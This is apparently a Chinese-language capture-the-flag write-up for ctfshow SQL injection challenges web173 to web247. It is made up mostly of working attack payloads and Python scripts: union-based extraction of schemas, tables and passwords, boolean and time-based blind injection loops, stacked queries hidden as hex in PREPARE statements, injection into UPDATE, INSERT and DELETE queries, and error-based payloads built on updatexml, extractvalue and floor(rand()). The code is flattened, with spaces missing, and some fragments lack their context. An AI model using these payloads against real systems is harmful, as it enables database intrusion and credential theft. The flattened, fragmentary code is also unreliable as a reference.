1' union select group_concat(schema_name),2 from information_schema.schemata%23 1'unionselect group_concat(table_name),2from information_schema.tables where table_schema="ctfshow_web"%23
1' union select group_concat(column_name),2 from information_schema.columns where table_name="ctfshow_user2"%23 1'unionselect group_concat(password),2from ctfshow_user2%23
web173
1 2 3 4 5 6 7
-1' union select 1,database(),3 --+ -1'unionselect1,group_concat(table_name),3from information_schema.tables where table_schema='ctfshow_web'--+
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user3' --+ -1'unionselect1,2,to_base64(password) from ctfshow_user3 --+
方法一样,换个函数
web174
没有数据页了,那就盲注一下吧,可以直接猜到表名和列名,所以测测就可以打
1
1' and 1=if(ascii(substr((select group_concat(password) from ctfshow_user4),1,1))>1,1,0)--+
defrepisTrue(char): payload=f'''1'and'{char}'='{char}''' r = requests.get(url+"?id="+payload) w = target.search(r.text) if w isnotNone: returnTrue returnFalse
if __name__ == '__main__': right = [] waf = [] for i inrange(32,127): if repisTrue(chr(i)): right.append((i, chr(i))) else: waf.append((i, chr(i))) print("right:", right) print("waf:", waf)
target="ctfshow{" for i inrange(100): for s in strings: payload=f"(ctfshow_user)where(pass)like'{target+s}%'" data={"tableName":payload} r=requests.post(url,data) if"$user_count = 1;"in r.text: target+=s print(target) break if s =="}": exit()
web184
利用group by对查询结果进行分组,再来筛选,写个脚本
1
selectcount(*) from ctfshow_user groupby pass having pass like0x63746673686f777b25;
defstr_to_hex(str): return''.join([hex(ord(c)).replace('0x', '') for c instr])
for i inrange(1, 50): for j in'0123456789abcdefghijklmnopqrstuvwxyz-{}': payload = "ctfshow_user a right join ctfshow_user b on b.pass like 0x{0}".format(str_to_hex(target + j + '%')) # print(payload) data = {'tableName': payload} r = requests.post(url=url, data=data) # print(r.text) if"$user_count = 43;"in r.text: target += j print(target) iflen(target) == 44: print(target + '}') exit()
url = 'http://50a0761d-8695-48df-bfe5-9410e5169332.challenge.ctf.show/select-waf.php' payload = 'ctfshow_user group by pass having pass like(concat({}))' target = 'ctfshow{'
defcreateNum(n): num = 'true' if n == 1: return'true' else: for i inrange(n - 1): num += "+true" return num
defcreateStrNum(c): str = '' str += 'chr(' + createNum(ord(c[0])) + ')' for i in c[1:]: str += ',chr(' + createNum(ord(i)) + ')' returnstr
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="-1' or if((ascii(substr((select database()),{0},1)))<{1},sleep(5),0)#".format(i,mid) # payload = "-1' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # ctfshow_flagxc # payload = "-1' or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # id,flagaa payload = "-1' or if((ascii(substr((select flagaa from ctfshow_flagxc),{0},1)))<{1},sleep(5),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="'MQ==') or if ((ascii(substr((select database()),{0},1)))<{1},sleep(5),0)#".format(i,mid) # payload = "'MQ==') or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # ctfshow_flagxcc # payload = "'MQ==') or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{0},1)))<{1},sleep(5),0)#".format( # i, mid) # id,flagaac payload = "'MQ==') or if ((ascii(substr((select flagaac from ctfshow_flagxcc),{0},1)))<{1},sleep(5),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format(i,mid) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( # i, mid) # ctfshow_flagxccb # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( # i, mid) # id,flagaabc payload = "1) or if ((ascii(substr((select flagaabc from ctfshow_flagxccb),{0},1)))<{1},BENCHMARK(25000000, SHA2('test', 512)),0)#".format( i, mid)
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # ctfshow_flagxc # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # id,flagaac payload = "1) or if ((ascii(substr((select flagaac from ctfshow_flagxc),{0},1)))<{1},{2},0)#".format( i, mid,sleep)
target="" i=0 right_time=0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)"
whileTrue: i+=1 head=32 tail=127 while head+1<tail: mid=(head + tail) >> 1 # payload="1) or if ((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "1) or if ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # ctfshow_flagxca # payload = "1) or if ((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxca'),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # id,flagaabc payload = "1) or if ((ascii(substr((select flagaabc from ctfshow_flagxca),{0},1)))<{1},{2},0)#".format( i, mid,sleep)
target="" i=0 right_time=0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)" strings="_-{}"+string.ascii_uppercase+string.ascii_lowercase+string.digits
for i inrange(1,50): found = False for s in strings: temp_target = target + s # payload = "1) or if((left((select database()),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # ctfshow # payload = "1) or if((left((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # ctfshow_flagxcac # payload = "1) or if((left((select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1),{0})='{1}'),{2},0)-- +".format( # i, temp_target, sleep) # flagaabcc payload = "1) or if((left((select flagaabcc from ctfshow_flagxcac limit 0,1),{0})='{1}'),{2},0)-- +".format( i, temp_target, sleep) # print(payload) data = { "ip": payload, "debug": 0 } start_time = time.time() r = requests.post(url, data) last_time = time.time() - start_time if last_time > right_time: # print("gogogo") target=temp_target print(target.lower()) found = True break
/api/?username=-1';PREPARE abcd from 0x73686f772020646174616261736573;execute abcd;# /api/?username=-1';PREPARE abcd from 0x73686F77207461626C6573;execute abcd;#
/api/?username=-1';PREPARE abcd from 0x73656C656374202A2066726F6D2063746673685F6F775F666C61676173;execute abcd;#
SELECT*FROM information_schema.Routines WHERE ROUTINE_NAME ='sp_name';
1 2
/api/?username=-1';PREPARE abcd from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E526F7574696E6573;execute abcd;#
web228
1 2
/api/?username=-1';PREPARE a from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161 ;execute a;#
web229
1 2 3 4 5 6
/api/?username=-1';PREPARE abcd from 0x73686f772020646174616261736573;execute abcd;# /api/?username=-1';PREPARE abcd from 0x73686F77207461626C6573;execute abcd;#
/api/?username=-1';PREPARE abcd from 0x73656c656374202a2066726f6d20666c6167;execute abcd;#
web230
1 2
/api/?username=-1';PREPARE abcd from 0x73656c656374202a2066726f6d20666c61676161626278;execute abcd;#
web231
路由是/api/
1
$sql= "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
update注入,在改变密码的同时将username也改变,插入Sql语句
1 2 3 4 5
password=-1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=
password=-1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=
password=-1',username=(select flagas from flaga)#&username=
有个槽点就是这个东西只能慢慢的去看回显好像
web232
闭合md5即可
1 2 3 4 5
password='),username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=
password='),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa')#&username=
password='),username=(select flagass from flagaa)#&username=
web233
由于不能传入',这里我们需要绕过一下,但是还是很简单,我们利用\将'转义即可
1 2 3 4 5
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name='flag233333')#
password=\&username=,username=(select flagass233 from flag233333)#
web234
1 2 3 4 5
password=\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
password=\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#
password=\&username=,username=(select flagass23s3 from flag23a)#
web235
用innodb_index_stats和innodb_table_stats查找表名
1 2 3 4
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())# banlist,ctfshow_user,flag23a1
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flag23a1 limit 1,1)a)#
这么看的话可能不是很好看懂,我再写个无列名注入的payload
1
password=\&username=,username=(select target_column from (SELECT 1, 2 AS target_column, 3 UNION SELECT * FROM flag23a1 limit 1,1)temp)#
就很容易看懂了
web236
1 2 3
password=\&username=,username=(select group_concat(table_name) from mysql.innodb_index_stats where database_name=database())#
password=\&username=,username=(select b from (select 1,2 as b,3 union select * from flaga limit 1,2)a)#
web237
注入点在/api/insert.php
1
$sql= "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";
for a1 in"ab": for a2 in"ab": for a3 in"ab": for a4 in"ab": for a5 in"ab": payload='flag'+a1+a2+a3+a4+a5 data={ 'username':f"1',(select(flag)from({payload})))#", 'password':'1' } r=requests.post(url=url,data=data)
web241
1
$sql= "delete from ctfshow_user where id = {$id}";
target = "" i = 0 right_time = 0.8 sleep="(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I)"
whileTrue: i += 1 head = 32 tail = 127 while head + 1 < tail: mid = (head + tail) >> 1 # payload="if((ascii(substr((select database()),{0},1)))<{1},{2},0)#".format(i,mid,sleep) # payload = "if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)))<{1},{2},0)#".format( # i, mid,sleep) # banlist,ctfshow_user,flag # payload = "if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{0},1)))<{1},{2},0)#".format( # i, mid, sleep) # id,flag payload = "if((ascii(substr((select flag from flag),{0},1)))<{1},{2},0)#".format( i, mid ,sleep)
# print(payload) data = { "id": payload, } start_time = time.time() r = requests.post(url, data) last_time = time.time() - start_time if last_time > right_time: tail = mid # print("right") else: head = mid # print("wrong")
if head != 32: target += chr(head) print(target) else: break print(target)
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(flag) from ctfshow_flag),1,32),0x3d),1)--+
/api/?id=1' or updatexml(1,concat(0x3d,mid((select group_concat(flag) from ctfshow_flag),32,32),0x3d),1)--+
web245
1 2 3 4 5 6 7 8 9
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(flag1) from ctfshow_flagsa),1,32),0x3d))--+
/api/?id=1' or extractvalue(1,concat(0x3d,mid((select group_concat(flag1) from ctfshow_flagsa),32,32),0x3d))--+
web246
报错原理:
MySQL 在执行 GROUP BY 时,会为每个不同的 group 创建一个临时表
rand() 会在查询执行过程中多次计算,而不是只计算一次
当 rand() 生成的值导致重复的键值出现时,MySQL 试图插入重复键到临时表时会产生错误
所以有时候运气不好需要发好几次包才能成功
1 2 3
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat((select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
limit\mid\right\left\substring都是一样的其实,
1 2 3 4 5
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flags'),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(flag2) from ctfshow_flags),1,32),0x7e,floor(rand()*2))a from information_schema.tables group by a--+
web247
ceil()-向上取整函数 ceil(x) 返回不小于 x 的最小整数,即向上取整。 例如,ceil(3.14) 返回 4。
round() - 四舍五入函数 round(x) 返回最接近 x 的整数,如果有两个整数与 x 距离相等,则返回偶数的整数。 例如,round(3.6) 返回 4,round(3.5) 返回 4,round(3.4) 返回 3。
1 2 3
?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,round(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+
正常写就行,最后一句有个小细节flag?要正确解析需要使用反引号
1 2 3
/api/?id=1' union select 1,count(*),concat(mid((select `flag?` from ctfshow_flagsa),1,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+
/api/?id=1' union select 1,count(*),concat(mid((select `flag?` from ctfshow_flagsa),32,32),0x7e,ceil(rand()*2))a from information_schema.tables group by a--+